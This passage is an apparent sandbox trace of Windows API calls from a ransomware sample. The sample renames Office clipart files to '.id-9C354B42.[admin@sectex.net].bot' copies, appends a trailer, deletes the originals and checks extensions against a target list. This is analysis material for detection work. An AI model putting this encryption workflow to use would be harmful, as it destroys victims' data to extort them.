	[0148.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.325] GetLastError () returned 0x0
	[0148.325] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x10f4, lpOverlapped=0x0) returned 1
	[0148.330] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1100, lpOverlapped=0x0) returned 1
	[0148.331] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.331] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.331] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.331] CloseHandle (hObject=0x3c0) returned 1
	[0148.331] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.331] SetEndOfFile (hFile=0x31c) returned 1
	[0148.334] CloseHandle (hObject=0x31c) returned 1
	[0148.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf")) returned 1
	[0148.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.335] lstrlenW (lpString=".doc") returned 4
	[0148.335] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString=".docx") returned 5
	[0148.335] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.335] lstrlenW (lpString=".pdf") returned 4
	[0148.335] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString=".xls") returned 4
	[0148.335] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.335] lstrlenW (lpString=".xlsx") returned 5
	[0148.335] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.335] lstrlenW (lpString=".ppt") returned 4
	[0148.335] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.335] lstrlenW (lpString=".zip") returned 4
	[0148.335] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.335] lstrlenW (lpString=".rar") returned 4
	[0148.335] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString=".bz2") returned 4
	[0148.335] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString=".7z") returned 3
	[0148.335] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.335] lstrlenW (lpString=".dbf") returned 4
	[0148.335] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.335] lstrlenW (lpString=".1cd") returned 4
	[0148.335] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString=".jpg") returned 4
	[0148.336] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString=".doc") returned 4
	[0148.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString=".docx") returned 5
	[0148.336] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.336] lstrlenW (lpString=".pdf") returned 4
	[0148.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString=".xls") returned 4
	[0148.336] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.336] lstrlenW (lpString=".xlsx") returned 5
	[0148.336] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.336] lstrlenW (lpString=".ppt") returned 4
	[0148.336] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString=".zip") returned 4
	[0148.336] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.336] lstrlenW (lpString=".rar") returned 4
	[0148.336] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString=".bz2") returned 4
	[0148.336] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString=".7z") returned 3
	[0148.336] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString=".dbf") returned 4
	[0148.336] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.336] lstrlenW (lpString=".1cd") returned 4
	[0148.337] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63
	[0148.337] lstrlenW (lpString=".jpg") returned 4
	[0148.337] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.337] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.337] lstrlenW (lpString="HH00688_.WMF") returned 12
	[0148.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.337] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7084) returned 1
	[0148.337] CloseHandle (hObject=0x31c) returned 1
	[0148.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf")) returned 0x20
	[0148.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.338] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.338] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.338] GetLastError () returned 0x0
	[0148.339] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1bac, lpOverlapped=0x0) returned 1
	[0148.377] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1bb0, lpOverlapped=0x0) returned 1
	[0148.379] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.379] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.379] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.379] CloseHandle (hObject=0x3c0) returned 1
	[0148.379] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.379] SetEndOfFile (hFile=0x31c) returned 1
	[0148.382] CloseHandle (hObject=0x31c) returned 1
	[0148.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf")) returned 1
	[0148.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString=".doc") returned 4
	[0148.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString=".docx") returned 5
	[0148.383] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.383] lstrlenW (lpString=".pdf") returned 4
	[0148.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString=".xls") returned 4
	[0148.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.383] lstrlenW (lpString=".xlsx") returned 5
	[0148.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.383] lstrlenW (lpString=".ppt") returned 4
	[0148.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString=".zip") returned 4
	[0148.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.383] lstrlenW (lpString=".rar") returned 4
	[0148.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString=".bz2") returned 4
	[0148.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString=".7z") returned 3
	[0148.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString=".dbf") returned 4
	[0148.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString=".1cd") returned 4
	[0148.383] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.383] lstrlenW (lpString=".jpg") returned 4
	[0148.383] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString=".doc") returned 4
	[0148.384] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString=".docx") returned 5
	[0148.384] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.384] lstrlenW (lpString=".pdf") returned 4
	[0148.384] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString=".xls") returned 4
	[0148.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.384] lstrlenW (lpString=".xlsx") returned 5
	[0148.384] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.384] lstrlenW (lpString=".ppt") returned 4
	[0148.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString=".zip") returned 4
	[0148.384] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.384] lstrlenW (lpString=".rar") returned 4
	[0148.384] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString=".bz2") returned 4
	[0148.384] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString=".7z") returned 3
	[0148.384] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString=".dbf") returned 4
	[0148.384] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString=".1cd") returned 4
	[0148.384] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63
	[0148.384] lstrlenW (lpString=".jpg") returned 4
	[0148.384] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.385] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.385] lstrlenW (lpString="HH00693_.WMF") returned 12
	[0148.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.385] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7098) returned 1
	[0148.385] CloseHandle (hObject=0x31c) returned 1
	[0148.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf")) returned 0x20
	[0148.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.386] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.386] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.386] GetLastError () returned 0x0
	[0148.386] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1bba, lpOverlapped=0x0) returned 1
	[0148.388] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1bc0, lpOverlapped=0x0) returned 1
	[0148.389] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.389] WriteFile (in: hFile=0x3c0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.389] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.390] CloseHandle (hObject=0x3c0) returned 1
	[0148.390] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.390] SetEndOfFile (hFile=0x31c) returned 1
	[0148.392] CloseHandle (hObject=0x31c) returned 1
	[0148.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.392] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf")) returned 1
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString=".doc") returned 4
	[0148.393] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString=".docx") returned 5
	[0148.393] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.393] lstrlenW (lpString=".pdf") returned 4
	[0148.393] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString=".xls") returned 4
	[0148.393] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.393] lstrlenW (lpString=".xlsx") returned 5
	[0148.393] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.393] lstrlenW (lpString=".ppt") returned 4
	[0148.393] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString=".zip") returned 4
	[0148.393] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.393] lstrlenW (lpString=".rar") returned 4
	[0148.393] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString=".bz2") returned 4
	[0148.393] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString=".7z") returned 3
	[0148.393] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString=".dbf") returned 4
	[0148.393] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString=".1cd") returned 4
	[0148.393] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.393] lstrlenW (lpString=".jpg") returned 4
	[0148.393] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.394] lstrlenW (lpString=".doc") returned 4
	[0148.394] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.394] lstrlenW (lpString=".docx") returned 5
	[0148.394] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.394] lstrlenW (lpString=".pdf") returned 4
	[0148.394] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.394] lstrlenW (lpString=".xls") returned 4
	[0148.394] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.394] lstrlenW (lpString=".xlsx") returned 5
	[0148.394] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.394] lstrlenW (lpString=".ppt") returned 4
	[0148.394] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.394] lstrlenW (lpString=".zip") returned 4
	[0148.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.672] lstrlenW (lpString=".rar") returned 4
	[0148.672] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.672] lstrlenW (lpString=".bz2") returned 4
	[0148.673] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.673] lstrlenW (lpString=".7z") returned 3
	[0148.673] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.673] lstrlenW (lpString=".dbf") returned 4
	[0148.673] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.673] lstrlenW (lpString=".1cd") returned 4
	[0148.673] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63
	[0148.673] lstrlenW (lpString=".jpg") returned 4
	[0148.673] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.673] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.673] lstrlenW (lpString="HH01759_.WMF") returned 12
	[0148.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.704] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5414) returned 1
	[0148.704] CloseHandle (hObject=0x3f0) returned 1
	[0148.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf")) returned 0x20
	[0148.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.715] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.716] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
